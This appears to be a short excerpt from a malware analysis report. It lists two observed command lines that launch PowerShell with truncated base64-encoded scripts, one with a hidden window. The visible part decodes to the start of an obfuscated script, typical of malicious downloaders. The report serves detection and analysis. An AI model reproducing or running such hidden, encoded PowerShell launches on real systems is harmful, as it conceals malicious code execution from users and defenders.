Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAHUAZgByAG8AaQBvAHUAZwA9ACcAQQBqAGwAbAB3AHAAbABiAGsAJwA7ACQAWQBrAG0AYgBvAHoAYwB6ACAAPQAgACcANgA0AD...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAHUAZgByAG8AaQBvAHUAZwA9ACcAQQBqAGwAbAB3AHAAbABiAGsAJwA7ACQAWQBrAG0AYgBvAHoAYwB6ACAAPQAgACcANgA0AD...' (with hidden window)